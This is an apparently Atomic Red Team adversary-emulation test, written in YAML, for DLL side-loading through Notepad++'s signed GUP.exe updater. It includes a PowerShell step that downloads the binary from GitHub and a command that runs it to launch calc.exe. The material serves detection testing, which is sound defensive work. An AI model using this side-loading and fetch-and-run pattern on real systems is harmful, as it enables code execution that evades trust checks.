---
attack_technique: T1073
display_name: DLL Side-Loading

atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
  auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040
  description: |
    GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
    Upon execution, calc.exe will be opened.

  supported_platforms:
    - windows

  input_arguments:
    process_name:
      description: Name of the created process
      type: string
      default: calculator.exe
    gup_executable:
      description: GUP is an open source signed binary used by Notepad++ for software updates
      type: path
      default: PathToAtomicsFolder\T1073\bin\GUP.exe

  dependency_executor_name: powershell
  dependencies:
    - description: |
        Gup.exe binary must exist on disk at specified location (#{gup_executable})
      prereq_command: |
        if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1073/bin/GUP.exe" -OutFile "#{gup_executable}"

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      #{gup_executable}
    cleanup_command: |
      taskkill /F /IM #{process_name} >nul 2>&1
